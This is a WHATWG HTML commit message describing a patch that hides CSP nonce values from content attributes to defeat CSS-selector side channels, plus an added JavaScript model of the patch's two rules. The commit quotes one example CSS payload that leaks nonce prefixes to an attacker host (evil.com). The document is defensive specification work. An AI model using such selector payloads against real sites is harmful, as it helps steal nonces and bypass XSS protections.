Commit
Some [recent attacks on CSP][1] rely on the ability to exfiltrate nonce data via various mechanisms that can read content attributes. CSS selectors are the best example: through clever use of prefix/postfix text matching selectors, values can be sent out to an attacker's server for reuse (e.g., `script[nonce=a] { background: url("https://evil.com/nonce?a");}`).

This patch mitigates the risk of this class of attack by hiding the nonce value from elements' content attributes by moving the `nonce` attributes into a new `NoncedElement` interface mixin, which is included into `HTMLElement`. That mixin defines the following behaviors for the `nonce` content attribute:

1. When the `nonce` content attribute is set or changed, its new value is copied into a `[[CryptographicNonce]]` slot on the element.
2. When a `NoncedElement` is inserted into a document which was delivered with a `Content-Security-Policy` header, the `nonce` content attribute is cleared out.

The `nonce` IDL attribute getter and setter now operate on the `[[CryptographicNonce]]` slot's value rather than reflecting the content attribute, meaning that the nonce value remains exposed to script, but is opaque to non-script side-channels. Likewise, the `[[CryptographicNonce]]` slot's value is used when populating a request's cryptographic nonce metadata in order to deliver the nonce to CSP for validation.

Tests: https://github.com/w3c/web-platform-tests/tree/master/content-security-policy/nonce-hiding

Closes whatwg#2369.

[1]: https://www.blackhat.com/docs/us-17/thursday/us-17-Lekies-Dont-Trust-The-DOM-Bypassing-XSS-Mitigations-Via-Script-Gadgets.pdf
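The two rules in the commit message, plus the IDL getter/setter and request-metadata behaviour, modelled as a small stand-alone JavaScript example. This is an added illustration, not code from the commit or from the HTML Standard: `Document`, `NoncedElement`, `insertedInto`, `requestNonceMetadata` and `matchesPrefixSelector` are this example's own names, the `cryptographicNonce` field stands in for the `[[CryptographicNonce]]` slot, and the prefix matcher is a stand-in for a CSS `[nonce^=...]` attribute selector. The sample nonce value is constructed. It shows why a selector-based side channel stops matching once the element is inserted into a CSP-delivered document, while script and the request's nonce metadata still see the value.

```javascript
// Added example (not part of the WHATWG commit): a model of the NoncedElement
// behaviour described in the commit message. All class and function names here
// are hypothetical; the "slot" is an ordinary field.

class Document {
  constructor({ deliveredWithCsp }) {
    // true when the document was delivered with a Content-Security-Policy header
    this.deliveredWithCsp = deliveredWithCsp;
    this.children = [];
  }
  appendChild(el) {
    this.children.push(el);
    el.insertedInto(this); // models the element's insertion steps
    return el;
  }
}

class NoncedElement {
  constructor() {
    this.attributes = new Map();  // content attributes: what CSS selectors can see
    this.cryptographicNonce = ""; // models the [[CryptographicNonce]] slot
  }

  setAttribute(name, value) {
    this.attributes.set(name, value);
    // Rule 1: when the nonce content attribute is set or changed,
    // copy its new value into the slot.
    if (name === "nonce") this.cryptographicNonce = value;
  }

  getAttribute(name) {
    return this.attributes.has(name) ? this.attributes.get(name) : null;
  }

  // The nonce IDL attribute reads and writes the slot, not the content attribute.
  get nonce() { return this.cryptographicNonce; }
  set nonce(value) { this.cryptographicNonce = String(value); }

  insertedInto(doc) {
    // Rule 2: inserted into a CSP-delivered document -> clear the content
    // attribute. The slot is left untouched, so the value stays reachable
    // through the IDL attribute and through request metadata.
    if (doc.deliveredWithCsp) this.attributes.delete("nonce");
  }

  // Models populating a request's cryptographic nonce metadata from the slot,
  // which is what CSP validates against.
  requestNonceMetadata() { return this.cryptographicNonce; }
}

// Stand-in for a CSS [attr^=prefix] selector: it can only see content attributes.
function matchesPrefixSelector(el, attr, prefix) {
  const v = el.getAttribute(attr);
  return v !== null && v.startsWith(prefix);
}

// Builds a document with or without CSP, inserts a nonced element and reports
// what each observer (selector, script, request metadata) can see afterwards.
function demo(deliveredWithCsp) {
  const doc = new Document({ deliveredWithCsp });
  const script = new NoncedElement();
  script.setAttribute("nonce", "abc123"); // constructed sample nonce
  doc.appendChild(script);
  return {
    contentAttribute: script.getAttribute("nonce"), // what selectors match on
    idlNonce: script.nonce,                          // what script sees
    requestNonce: script.requestNonceMetadata(),     // what CSP validates
    selectorMatches: matchesPrefixSelector(script, "nonce", "a"),
  };
}

console.log("with CSP:   ", JSON.stringify(demo(true)));
console.log("without CSP:", JSON.stringify(demo(false)));
```

With CSP delivered, `contentAttribute` is `null` and the prefix selector no longer matches, yet `idlNonce` and `requestNonce` both still return the nonce; without CSP the content attribute is left alone, which is the pre-patch behaviour for documents that have no nonce to protect. Note that the model only implements the two rules the commit message states; it does not cover attribute removal or any later refinements to the standard.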